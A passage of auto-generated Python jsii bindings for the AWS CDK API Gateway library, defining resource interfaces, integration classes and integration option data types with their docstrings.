@jsii.member(jsii_name="resourceId")
def resource_id(self) -> str:
"""The ID of the resource.
attribute:
:attribute:: true
"""
...
@property
@jsii.member(jsii_name="restApi")
def rest_api(self) -> "RestApi":
"""The rest API that this resource is part of.
The reason we need the RestApi object itself and not just the ID is because the model
is being tracked by the top-level RestApi object for the purpose of calculating it's
hash to determine the ID of the deployment. This allows us to automatically update
the deployment when the model of the REST API changes.
"""
...
@property
@jsii.member(jsii_name="defaultCorsPreflightOptions")
def default_cors_preflight_options(self) -> typing.Optional["CorsOptions"]:
"""Default options for CORS preflight OPTIONS method."""
...
@property
@jsii.member(jsii_name="defaultIntegration")
def default_integration(self) -> typing.Optional["Integration"]:
"""An integration to use as a default for all methods created within this API unless an integration is specified."""
...
@property
@jsii.member(jsii_name="defaultMethodOptions")
def default_method_options(self) -> typing.Optional["MethodOptions"]:
"""Method options to use as a default for all methods created within this API unless custom options are specified."""
...
@property
@jsii.member(jsii_name="parentResource")
def parent_resource(self) -> typing.Optional["IResource"]:
"""The parent of this resource or undefined for the root resource."""
...
@jsii.member(jsii_name="addCorsPreflight")
def add_cors_preflight(self, *, allow_origins: typing.List[str], allow_credentials: typing.Optional[bool]=None, allow_headers: typing.Optional[typing.List[str]]=None, allow_methods: typing.Optional[typing.List[str]]=None, disable_cache: typing.Optional[bool]=None, expose_headers: typing.Optional[typing.List[str]]=None, max_age: typing.Optional[aws_cdk.core.Duration]=None, status_code: typing.Optional[jsii.Number]=None) -> "Method":
"""Adds an OPTIONS method to this resource which responds to Cross-Origin Resource Sharing (CORS) preflight requests.
Cross-Origin Resource Sharing (CORS) is a mechanism that uses additional
HTTP headers to tell browsers to give a web application running at one
origin, access to selected resources from a different origin. A web
application executes a cross-origin HTTP request when it requests a
resource that has a different origin (domain, protocol, or port) from its
own.
:param options: CORS options.
:param allow_origins: Specifies the list of origins that are allowed to make requests to this resource. If you wish to allow all origins, specify ``Cors.ALL_ORIGINS`` or ``[ * ]``. Responses will include the ``Access-Control-Allow-Origin`` response header. If ``Cors.ALL_ORIGINS`` is specified, the ``Vary: Origin`` response header will also be included.
:param allow_credentials: The Access-Control-Allow-Credentials response header tells browsers whether to expose the response to frontend JavaScript code when the request's credentials mode (Request.credentials) is "include". When a request's credentials mode (Request.credentials) is "include", browsers will only expose the response to frontend JavaScript code if the Access-Control-Allow-Credentials value is true. Credentials are cookies, authorization headers or TLS client certificates. Default: false
:param allow_headers: The Access-Control-Allow-Headers response header is used in response to a preflight request which includes the Access-Control-Request-Headers to indicate which HTTP headers can be used during the actual request. Default: Cors.DEFAULT_HEADERS
:param allow_methods: The Access-Control-Allow-Methods response header specifies the method or methods allowed when accessing the resource in response to a preflight request. If ``ANY`` is specified, it will be expanded to ``Cors.ALL_METHODS``. Default: Cors.ALL_METHODS
:param disable_cache: Sets Access-Control-Max-Age to -1, which means that caching is disabled. This option cannot be used with ``maxAge``. Default: - cache is enabled
:param expose_headers: The Access-Control-Expose-Headers response header indicates which headers can be exposed as part of the response by listing their names. If you want clients to be able to access other headers, you have to list them using the Access-Control-Expose-Headers header. Default: - only the 6 CORS-safelisted response headers are exposed: Cache-Control, Content-Language, Content-Type, Expires, Last-Modified, Pragma
:param max_age: The Access-Control-Max-Age response header indicates how long the results of a preflight request (that is the information contained in the Access-Control-Allow-Methods and Access-Control-Allow-Headers headers) can be cached. To disable caching altogther use ``disableCache: true``. Default: - browser-specific (see reference)
:param status_code: Specifies the response status code returned from the OPTIONS method. Default: 204
return
:return: a ``Method`` object
see
:see: https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS
"""
...
@jsii.member(jsii_name="addMethod")
def add_method(self, http_method: str, target: typing.Optional["Integration"]=None, *, api_key_required: typing.Optional[bool]=None, authorization_type: typing.Optional["AuthorizationType"]=None, authorizer: typing.Optional["IAuthorizer"]=None, method_responses: typing.Optional[typing.List["MethodResponse"]]=None, operation_name: typing.Optional[str]=None, request_models: typing.Optional[typing.Mapping[str,"IModel"]]=None, request_parameters: typing.Optional[typing.Mapping[str,bool]]=None, request_validator: typing.Optional["IRequestValidator"]=None) -> "Method":
"""Defines a new method for this resource.
:param http_method: The HTTP method.
:param target: The target backend integration for this method.
:param options: Method options, such as authentication.
:param api_key_required: Indicates whether the method requires clients to submit a valid API key. Default: false
:param authorization_type: Method authorization. Default: None open access
:param authorizer: If ``authorizationType`` is ``Custom``, this specifies the ID of the method authorizer resource.
:param method_responses: The responses that can be sent to the client who calls the method. Default: None This property is not required, but if these are not supplied for a Lambda proxy integration, the Lambda function must return a value of the correct format, for the integration response to be correctly mapped to a response to the client.
:param operation_name: A friendly operation name for the method. For example, you can assign the OperationName of ListPets for the GET /pets method.
:param request_models: The resources that are used for the response's content type. Specify request models as key-value pairs (string-to-string mapping), with a content type as the key and a Model resource name as the value
:param request_parameters: The request parameters that API Gateway accepts. Specify request parameters as key-value pairs (string-to-Boolean mapping), with a source as the key and a Boolean as the value. The Boolean specifies whether a parameter is required. A source must match the format method.request.location.name, where the location is querystring, path, or header, and name is a valid, unique parameter name. Default: None
:param request_validator: The ID of the associated request validator.
return
:return: The newly created ``Method`` object.
"""
...
@jsii.member(jsii_name="addProxy")
def add_proxy(self, *, any_method: typing.Optional[bool]=None, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None) -> "ProxyResource":
"""Adds a greedy proxy resource ("{proxy+}") and an ANY method to this route.
:param options: Default integration and method options.
:param any_method: Adds an "ANY" method to this resource. If set to ``false``, you will have to explicitly add methods to this resource after it's created. Default: true
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
"""
...
@jsii.member(jsii_name="addResource")
def add_resource(self, path_part: str, *, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None) -> "Resource":
"""Defines a new child resource where this resource is the parent.
:param path_part: The path part for the child resource.
:param options: Resource options.
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
return
:return: A Resource object
"""
...
@jsii.member(jsii_name="getResource")
def get_resource(self, path_part: str) -> typing.Optional["IResource"]:
"""Retrieves a child resource by path part.
:param path_part: The path part of the child resource.
return
:return: the child resource or undefined if not found
"""
...
@jsii.member(jsii_name="resourceForPath")
def resource_for_path(self, path: str) -> "Resource":
"""Gets or create all resources leading up to the specified path.
- Path may only start with "/" if this method is called on the root resource.
- All resources are created using default options.
:param path: The relative path.
return
:return: a new or existing resource.
"""
...
class _IResourceProxy(jsii.proxy_for(aws_cdk.core.IResource)):
__jsii_type__ = "@aws-cdk/aws-apigateway.IResource"
@property
@jsii.member(jsii_name="path")
def path(self) -> str:
"""The full path of this resuorce."""
return jsii.get(self, "path")
@property
@jsii.member(jsii_name="resourceId")
def resource_id(self) -> str:
"""The ID of the resource.
attribute:
:attribute:: true
"""
return jsii.get(self, "resourceId")
@property
@jsii.member(jsii_name="restApi")
def rest_api(self) -> "RestApi":
"""The rest API that this resource is part of.
The reason we need the RestApi object itself and not just the ID is because the model
is being tracked by the top-level RestApi object for the purpose of calculating it's
hash to determine the ID of the deployment. This allows us to automatically update
the deployment when the model of the REST API changes.
"""
return jsii.get(self, "restApi")
@property
@jsii.member(jsii_name="defaultCorsPreflightOptions")
def default_cors_preflight_options(self) -> typing.Optional["CorsOptions"]:
"""Default options for CORS preflight OPTIONS method."""
return jsii.get(self, "defaultCorsPreflightOptions")
@property
@jsii.member(jsii_name="defaultIntegration")
def default_integration(self) -> typing.Optional["Integration"]:
"""An integration to use as a default for all methods created within this API unless an integration is specified."""
return jsii.get(self, "defaultIntegration")
@property
@jsii.member(jsii_name="defaultMethodOptions")
def default_method_options(self) -> typing.Optional["MethodOptions"]:
"""Method options to use as a default for all methods created within this API unless custom options are specified."""
return jsii.get(self, "defaultMethodOptions")
@property
@jsii.member(jsii_name="parentResource")
def parent_resource(self) -> typing.Optional["IResource"]:
"""The parent of this resource or undefined for the root resource."""
return jsii.get(self, "parentResource")
@jsii.member(jsii_name="addCorsPreflight")
def add_cors_preflight(self, *, allow_origins: typing.List[str], allow_credentials: typing.Optional[bool]=None, allow_headers: typing.Optional[typing.List[str]]=None, allow_methods: typing.Optional[typing.List[str]]=None, disable_cache: typing.Optional[bool]=None, expose_headers: typing.Optional[typing.List[str]]=None, max_age: typing.Optional[aws_cdk.core.Duration]=None, status_code: typing.Optional[jsii.Number]=None) -> "Method":
"""Adds an OPTIONS method to this resource which responds to Cross-Origin Resource Sharing (CORS) preflight requests.
Cross-Origin Resource Sharing (CORS) is a mechanism that uses additional
HTTP headers to tell browsers to give a web application running at one
origin, access to selected resources from a different origin. A web
application executes a cross-origin HTTP request when it requests a
resource that has a different origin (domain, protocol, or port) from its
own.
:param options: CORS options.
:param allow_origins: Specifies the list of origins that are allowed to make requests to this resource. If you wish to allow all origins, specify ``Cors.ALL_ORIGINS`` or ``[ * ]``. Responses will include the ``Access-Control-Allow-Origin`` response header. If ``Cors.ALL_ORIGINS`` is specified, the ``Vary: Origin`` response header will also be included.
:param allow_credentials: The Access-Control-Allow-Credentials response header tells browsers whether to expose the response to frontend JavaScript code when the request's credentials mode (Request.credentials) is "include". When a request's credentials mode (Request.credentials) is "include", browsers will only expose the response to frontend JavaScript code if the Access-Control-Allow-Credentials value is true. Credentials are cookies, authorization headers or TLS client certificates. Default: false
:param allow_headers: The Access-Control-Allow-Headers response header is used in response to a preflight request which includes the Access-Control-Request-Headers to indicate which HTTP headers can be used during the actual request. Default: Cors.DEFAULT_HEADERS
:param allow_methods: The Access-Control-Allow-Methods response header specifies the method or methods allowed when accessing the resource in response to a preflight request. If ``ANY`` is specified, it will be expanded to ``Cors.ALL_METHODS``. Default: Cors.ALL_METHODS
:param disable_cache: Sets Access-Control-Max-Age to -1, which means that caching is disabled. This option cannot be used with ``maxAge``. Default: - cache is enabled
:param expose_headers: The Access-Control-Expose-Headers response header indicates which headers can be exposed as part of the response by listing their names. If you want clients to be able to access other headers, you have to list them using the Access-Control-Expose-Headers header. Default: - only the 6 CORS-safelisted response headers are exposed: Cache-Control, Content-Language, Content-Type, Expires, Last-Modified, Pragma
:param max_age: The Access-Control-Max-Age response header indicates how long the results of a preflight request (that is the information contained in the Access-Control-Allow-Methods and Access-Control-Allow-Headers headers) can be cached. To disable caching altogther use ``disableCache: true``. Default: - browser-specific (see reference)
:param status_code: Specifies the response status code returned from the OPTIONS method. Default: 204
return
:return: a ``Method`` object
see
:see: https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS
"""
options = CorsOptions(allow_origins=allow_origins, allow_credentials=allow_credentials, allow_headers=allow_headers, allow_methods=allow_methods, disable_cache=disable_cache, expose_headers=expose_headers, max_age=max_age, status_code=status_code)
return jsii.invoke(self, "addCorsPreflight", [options])
@jsii.member(jsii_name="addMethod")
def add_method(self, http_method: str, target: typing.Optional["Integration"]=None, *, api_key_required: typing.Optional[bool]=None, authorization_type: typing.Optional["AuthorizationType"]=None, authorizer: typing.Optional["IAuthorizer"]=None, method_responses: typing.Optional[typing.List["MethodResponse"]]=None, operation_name: typing.Optional[str]=None, request_models: typing.Optional[typing.Mapping[str,"IModel"]]=None, request_parameters: typing.Optional[typing.Mapping[str,bool]]=None, request_validator: typing.Optional["IRequestValidator"]=None) -> "Method":
"""Defines a new method for this resource.
:param http_method: The HTTP method.
:param target: The target backend integration for this method.
:param options: Method options, such as authentication.
:param api_key_required: Indicates whether the method requires clients to submit a valid API key. Default: false
:param authorization_type: Method authorization. Default: None open access
:param authorizer: If ``authorizationType`` is ``Custom``, this specifies the ID of the method authorizer resource.
:param method_responses: The responses that can be sent to the client who calls the method. Default: None This property is not required, but if these are not supplied for a Lambda proxy integration, the Lambda function must return a value of the correct format, for the integration response to be correctly mapped to a response to the client.
:param operation_name: A friendly operation name for the method. For example, you can assign the OperationName of ListPets for the GET /pets method.
:param request_models: The resources that are used for the response's content type. Specify request models as key-value pairs (string-to-string mapping), with a content type as the key and a Model resource name as the value
:param request_parameters: The request parameters that API Gateway accepts. Specify request parameters as key-value pairs (string-to-Boolean mapping), with a source as the key and a Boolean as the value. The Boolean specifies whether a parameter is required. A source must match the format method.request.location.name, where the location is querystring, path, or header, and name is a valid, unique parameter name. Default: None
:param request_validator: The ID of the associated request validator.
return
:return: The newly created ``Method`` object.
"""
options = MethodOptions(api_key_required=api_key_required, authorization_type=authorization_type, authorizer=authorizer, method_responses=method_responses, operation_name=operation_name, request_models=request_models, request_parameters=request_parameters, request_validator=request_validator)
return jsii.invoke(self, "addMethod", [http_method, target, options])
@jsii.member(jsii_name="addProxy")
def add_proxy(self, *, any_method: typing.Optional[bool]=None, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None) -> "ProxyResource":
"""Adds a greedy proxy resource ("{proxy+}") and an ANY method to this route.
:param options: Default integration and method options.
:param any_method: Adds an "ANY" method to this resource. If set to ``false``, you will have to explicitly add methods to this resource after it's created. Default: true
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
"""
options = ProxyResourceOptions(any_method=any_method, default_cors_preflight_options=default_cors_preflight_options, default_integration=default_integration, default_method_options=default_method_options)
return jsii.invoke(self, "addProxy", [options])
@jsii.member(jsii_name="addResource")
def add_resource(self, path_part: str, *, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None) -> "Resource":
"""Defines a new child resource where this resource is the parent.
:param path_part: The path part for the child resource.
:param options: Resource options.
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
return
:return: A Resource object
"""
options = ResourceOptions(default_cors_preflight_options=default_cors_preflight_options, default_integration=default_integration, default_method_options=default_method_options)
return jsii.invoke(self, "addResource", [path_part, options])
@jsii.member(jsii_name="getResource")
def get_resource(self, path_part: str) -> typing.Optional["IResource"]:
"""Retrieves a child resource by path part.
:param path_part: The path part of the child resource.
return
:return: the child resource or undefined if not found
"""
return jsii.invoke(self, "getResource", [path_part])
@jsii.member(jsii_name="resourceForPath")
def resource_for_path(self, path: str) -> "Resource":
"""Gets or create all resources leading up to the specified path.
- Path may only start with "/" if this method is called on the root resource.
- All resources are created using default options.
:param path: The relative path.
return
:return: a new or existing resource.
"""
return jsii.invoke(self, "resourceForPath", [path])
@jsii.interface(jsii_type="@aws-cdk/aws-apigateway.IRestApi")
class IRestApi(aws_cdk.core.IResource, jsii.compat.Protocol):
@staticmethod
def __jsii_proxy_class__():
return _IRestApiProxy
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> str:
"""The ID of this API Gateway RestApi.
attribute:
:attribute:: true
"""
...
class _IRestApiProxy(jsii.proxy_for(aws_cdk.core.IResource)):
__jsii_type__ = "@aws-cdk/aws-apigateway.IRestApi"
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> str:
"""The ID of this API Gateway RestApi.
attribute:
:attribute:: true
"""
return jsii.get(self, "restApiId")
class Integration(metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.Integration"):
"""Base class for backend integrations for an API Gateway method.
Use one of the concrete classes such as ``MockIntegration``, ``AwsIntegration``, ``LambdaIntegration``
or implement on your own by specifying the set of props.
"""
def __init__(self, *, type: "IntegrationType", integration_http_method: typing.Optional[str]=None, options: typing.Optional["IntegrationOptions"]=None, uri: typing.Any=None) -> None:
"""
:param props: -
:param type: Specifies an API method integration type.
:param integration_http_method: The integration's HTTP method type. Required unless you use a MOCK integration.
:param options: Integration options.
:param uri: The Uniform Resource Identifier (URI) for the integration. - If you specify HTTP for the ``type`` property, specify the API endpoint URL. - If you specify MOCK for the ``type`` property, don't specify this property. - If you specify AWS for the ``type`` property, specify an AWS service that follows this form: ``arn:aws:apigateway:region:subdomain.service|service:path|action/service_api.`` For example, a Lambda function URI follows this form: arn:aws:apigateway:region:lambda:path/path. The path is usually in the form /2015-03-31/functions/LambdaFunctionARN/invocations.
"""
props = IntegrationProps(type=type, integration_http_method=integration_http_method, options=options, uri=uri)
jsii.create(Integration, self, [props])
@jsii.member(jsii_name="bind")
def bind(self, _method: "Method") -> None:
"""Can be overridden by subclasses to allow the integration to interact with the method being integrated, access the REST API object, method ARNs, etc.
:param _method: -
"""
return jsii.invoke(self, "bind", [_method])
class AwsIntegration(Integration, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.AwsIntegration"):
"""This type of integration lets an API expose AWS service actions.
It is
intended for calling all AWS service actions, but is not recommended for
calling a Lambda function, because the Lambda custom integration is a legacy
technology.
"""
def __init__(self, *, service: str, action: typing.Optional[str]=None, action_parameters: typing.Optional[typing.Mapping[str,str]]=None, integration_http_method: typing.Optional[str]=None, options: typing.Optional["IntegrationOptions"]=None, path: typing.Optional[str]=None, proxy: typing.Optional[bool]=None, subdomain: typing.Optional[str]=None) -> None:
"""
:param props: -
:param service: The name of the integrated AWS service (e.g. ``s3``).
:param action: The AWS action to perform in the integration. Use ``actionParams`` to specify key-value params for the action. Mutually exclusive with ``path``.
:param action_parameters: Parameters for the action. ``action`` must be set, and ``path`` must be undefined. The action params will be URL encoded.
:param integration_http_method: The integration's HTTP method type. Default: POST
:param options: Integration options, such as content handling, request/response mapping, etc.
:param path: The path to use for path-base APIs. For example, for S3 GET, you can set path to ``bucket/key``. For lambda, you can set path to ``2015-03-31/functions/${function-arn}/invocations`` Mutually exclusive with the ``action`` options.
:param proxy: Use AWS_PROXY integration. Default: false
:param subdomain: A designated subdomain supported by certain AWS service for fast host-name lookup.
"""
props = AwsIntegrationProps(service=service, action=action, action_parameters=action_parameters, integration_http_method=integration_http_method, options=options, path=path, proxy=proxy, subdomain=subdomain)
jsii.create(AwsIntegration, self, [props])
@jsii.member(jsii_name="bind")
def bind(self, method: "Method") -> None:
"""Can be overridden by subclasses to allow the integration to interact with the method being integrated, access the REST API object, method ARNs, etc.
:param method: -
"""
return jsii.invoke(self, "bind", [method])
class HttpIntegration(Integration, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.HttpIntegration"):
"""You can integrate an API method with an HTTP endpoint using the HTTP proxy integration or the HTTP custom integration,.
With the proxy integration, the setup is simple. You only need to set the
HTTP method and the HTTP endpoint URI, according to the backend requirements,
if you are not concerned with content encoding or caching.
With the custom integration, the setup is more involved. In addition to the
proxy integration setup steps, you need to specify how the incoming request
data is mapped to the integration request and how the resulting integration
response data is mapped to the method response.
"""
def __init__(self, url: str, *, http_method: typing.Optional[str]=None, options: typing.Optional["IntegrationOptions"]=None, proxy: typing.Optional[bool]=None) -> None:
"""
:param url: -
:param props: -
:param http_method: HTTP method to use when invoking the backend URL. Default: GET
:param options: Integration options, such as request/resopnse mapping, content handling, etc. Default: defaults based on ``IntegrationOptions`` defaults
:param proxy: Determines whether to use proxy integration or custom integration. Default: true
"""
props = HttpIntegrationProps(http_method=http_method, options=options, proxy=proxy)
jsii.create(HttpIntegration, self, [url, props])
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.IntegrationOptions", jsii_struct_bases=[], name_mapping={'cache_key_parameters': 'cacheKeyParameters', 'cache_namespace': 'cacheNamespace', 'connection_type': 'connectionType', 'content_handling': 'contentHandling', 'credentials_passthrough': 'credentialsPassthrough', 'credentials_role': 'credentialsRole', 'integration_responses': 'integrationResponses', 'passthrough_behavior': 'passthroughBehavior', 'request_parameters': 'requestParameters', 'request_templates': 'requestTemplates', 'vpc_link': 'vpcLink'})
class IntegrationOptions():
def __init__(self, *, cache_key_parameters: typing.Optional[typing.List[str]]=None, cache_namespace: typing.Optional[str]=None, connection_type: typing.Optional["ConnectionType"]=None, content_handling: typing.Optional["ContentHandling"]=None, credentials_passthrough: typing.Optional[bool]=None, credentials_role: typing.Optional[aws_cdk.aws_iam.IRole]=None, integration_responses: typing.Optional[typing.List["IntegrationResponse"]]=None, passthrough_behavior: typing.Optional["PassthroughBehavior"]=None, request_parameters: typing.Optional[typing.Mapping[str,str]]=None, request_templates: typing.Optional[typing.Mapping[str,str]]=None, vpc_link: typing.Optional["VpcLink"]=None):
"""
:param cache_key_parameters: A list of request parameters whose values are to be cached. It determines request parameters that will make it into the cache key.
:param cache_namespace: An API-specific tag group of related cached parameters.
:param connection_type: The type of network connection to the integration endpoint. Default: ConnectionType.Internet
:param content_handling: Specifies how to handle request payload content type conversions. Default: none if this property isn't defined, the request payload is passed through from the method request to the integration request without modification, provided that the ``passthroughBehaviors`` property is configured to support payload pass-through.
:param credentials_passthrough: Requires that the caller's identity be passed through from the request. Default: Caller identity is not passed through
:param credentials_role: An IAM role that API Gateway assumes. Mutually exclusive with ``credentialsPassThrough``. Default: A role is not assumed
:param integration_responses: The response that API Gateway provides after a method's backend completes processing a request. API Gateway intercepts the response from the backend so that you can control how API Gateway surfaces backend responses. For example, you can map the backend status codes to codes that you define.
:param passthrough_behavior: Specifies the pass-through behavior for incoming requests based on the Content-Type header in the request, and the available mapping templates specified as the requestTemplates property on the Integration resource. There are three valid values: WHEN_NO_MATCH, WHEN_NO_TEMPLATES, and NEVER.
:param request_parameters: The request parameters that API Gateway sends with the backend request. Specify request parameters as key-value pairs (string-to-string mappings), with a destination as the key and a source as the value. Specify the destination by using the following pattern integration.request.location.name, where location is querystring, path, or header, and name is a valid, unique parameter name. The source must be an existing method request parameter or a static value. You must enclose static values in single quotation marks and pre-encode these values based on their destination in the request.
:param request_templates: A map of Apache Velocity templates that are applied on the request payload. The template that API Gateway uses is based on the value of the Content-Type header that's sent by the client. The content type value is the key, and the template is the value (specified as a string), such as the following snippet: { "application/json": "{\n "statusCode": "200"\n}" }
:param vpc_link: The VpcLink used for the integration. Required if connectionType is VPC_LINK.
"""
self._values = {
}
if cache_key_parameters is not None: self._values["cache_key_parameters"] = cache_key_parameters
if cache_namespace is not None: self._values["cache_namespace"] = cache_namespace
if connection_type is not None: self._values["connection_type"] = connection_type
if content_handling is not None: self._values["content_handling"] = content_handling
if credentials_passthrough is not None: self._values["credentials_passthrough"] = credentials_passthrough
if credentials_role is not None: self._values["credentials_role"] = credentials_role
if integration_responses is not None: self._values["integration_responses"] = integration_responses
if passthrough_behavior is not None: self._values["passthrough_behavior"] = passthrough_behavior
if request_parameters is not None: self._values["request_parameters"] = request_parameters
if request_templates is not None: self._values["request_templates"] = request_templates
if vpc_link is not None: self._values["vpc_link"] = vpc_link
@property
def cache_key_parameters(self) -> typing.Optional[typing.List[str]]:
"""A list of request parameters whose values are to be cached.
It determines
request parameters that will make it into the cache key.
"""
return self._values.get('cache_key_parameters')
@property
def cache_namespace(self) -> typing.Optional[str]:
"""An API-specific tag group of related cached parameters."""
return self._values.get('cache_namespace')
@property
def connection_type(self) -> typing.Optional["ConnectionType"]:
"""The type of network connection to the integration endpoint.
default
:default: ConnectionType.Internet
"""
return self._values.get('connection_type')
@property
def content_handling(self) -> typing.Optional["ContentHandling"]:
"""Specifies how to handle request payload content type conversions.
default
:default:
none if this property isn't defined, the request payload is passed
through from the method request to the integration request without
modification, provided that the ``passthroughBehaviors`` property is
configured to support payload pass-through.
"""
return self._values.get('content_handling')
@property
def credentials_passthrough(self) -> typing.Optional[bool]:
"""Requires that the caller's identity be passed through from the request.
default
:default: Caller identity is not passed through
"""
return self._values.get('credentials_passthrough')
@property
def credentials_role(self) -> typing.Optional[aws_cdk.aws_iam.IRole]:
"""An IAM role that API Gateway assumes.
Mutually exclusive with ``credentialsPassThrough``.
default
:default: A role is not assumed
"""
return self._values.get('credentials_role')
@property
def integration_responses(self) -> typing.Optional[typing.List["IntegrationResponse"]]:
"""The response that API Gateway provides after a method's backend completes processing a request.
API Gateway intercepts the response from the
backend so that you can control how API Gateway surfaces backend
responses. For example, you can map the backend status codes to codes
that you define.
"""
return self._values.get('integration_responses')
@property
def passthrough_behavior(self) -> typing.Optional["PassthroughBehavior"]:
"""Specifies the pass-through behavior for incoming requests based on the Content-Type header in the request, and the available mapping templates specified as the requestTemplates property on the Integration resource. There are three valid values: WHEN_NO_MATCH, WHEN_NO_TEMPLATES, and NEVER."""
return self._values.get('passthrough_behavior')
@property
def request_parameters(self) -> typing.Optional[typing.Mapping[str,str]]:
"""The request parameters that API Gateway sends with the backend request. Specify request parameters as key-value pairs (string-to-string mappings), with a destination as the key and a source as the value.
Specify the destination by using the following pattern
integration.request.location.name, where location is querystring, path,
or header, and name is a valid, unique parameter name.
The source must be an existing method request parameter or a static
value. You must enclose static values in single quotation marks and
pre-encode these values based on their destination in the request.
"""
return self._values.get('request_parameters')
@property
def request_templates(self) -> typing.Optional[typing.Mapping[str,str]]:
"""A map of Apache Velocity templates that are applied on the request payload.
The template that API Gateway uses is based on the value of the
Content-Type header that's sent by the client. The content type value is
the key, and the template is the value (specified as a string), such as
the following snippet:
{ "application/json": "{\n "statusCode": "200"\n}" }
see
:see: http://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-mapping-template-reference.html
"""
return self._values.get('request_templates')
@property
def vpc_link(self) -> typing.Optional["VpcLink"]:
"""The VpcLink used for the integration. Required if connectionType is VPC_LINK."""
return self._values.get('vpc_link')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'IntegrationOptions(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.IntegrationProps", jsii_struct_bases=[], name_mapping={'type': 'type', 'integration_http_method': 'integrationHttpMethod', 'options': 'options', 'uri': 'uri'})
class IntegrationProps():
def __init__(self, *, type: "IntegrationType", integration_http_method: typing.Optional[str]=None, options: typing.Optional["IntegrationOptions"]=None, uri: typing.Any=None):
"""
:param type: Specifies an API method integration type.
:param integration_http_method: The integration's HTTP method type. Required unless you use a MOCK integration.
:param options: Integration options.
:param uri: The Uniform Resource Identifier (URI) for the integration. - If you specify HTTP for the ``type`` property, specify the API endpoint URL. - If you specify MOCK for the ``type`` property, don't specify this property. - If you specify AWS for the ``type`` property, specify an AWS service that follows this form: ``arn:aws:apigateway:region:subdomain.service|service:path|action/service_api.`` For example, a Lambda function URI follows this form: arn:aws:apigateway:region:lambda:path/path. The path is usually in the form /2015-03-31/functions/LambdaFunctionARN/invocations.
"""
if isinstance(options, dict): options = IntegrationOptions(**options)
self._values = {
'type': type,
}
if integration_http_method is not None: self._values["integration_http_method"] = integration_http_method
if options is not None: self._values["options"] = options
if uri is not None: self._values["uri"] = uri
@property
def type(self) -> "IntegrationType":
"""Specifies an API method integration type."""
return self._values.get('type')
@property
def integration_http_method(self) -> typing.Optional[str]:
"""The integration's HTTP method type. Required unless you use a MOCK integration."""
return self._values.get('integration_http_method')
@property
def options(self) -> typing.Optional["IntegrationOptions"]:
"""Integration options."""
return self._values.get('options')
@property
def uri(self) -> typing.Any:
"""The Uniform Resource Identifier (URI) for the integration.
- If you specify HTTP for the ``type`` property, specify the API endpoint URL.
- If you specify MOCK for the ``type`` property, don't specify this property.
- If you specify AWS for the ``type`` property, specify an AWS service that
follows this form: ``arn:aws:apigateway:region:subdomain.service|service:path|action/service_api.``
For example, a Lambda function URI follows this form:
arn:aws:apigateway:region:lambda:path/path. The path is usually in the
form /2015-03-31/functions/LambdaFunctionARN/invocations.
see
:see: https://docs.aws.amazon.com/apigateway/api-reference/resource/integration/#uri
"""
return self._values.get('uri')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'IntegrationProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.IntegrationResponse", jsii_struct_bases=[], name_mapping={'status_code': 'statusCode', 'content_handling': 'contentHandling', 'response_parameters': 'responseParameters', 'response_templates': 'responseTemplates', 'selection_pattern': 'selectionPattern'})
class IntegrationResponse():
def __init__(self, *, status_code: str, content_handling: typing.Optional["ContentHandling"]=None, response_parameters: typing.Optional[typing.Mapping[str,str]]=None, response_templates: typing.Optional[typing.Mapping[str,str]]=None, selection_pattern: typing.Optional[str]=None):
"""
:param status_code: The status code that API Gateway uses to map the integration response to a MethodResponse status code.
:param content_handling: Specifies how to handle request payload content type conversions. Default: none the request payload is passed through from the method request to the integration request without modification.
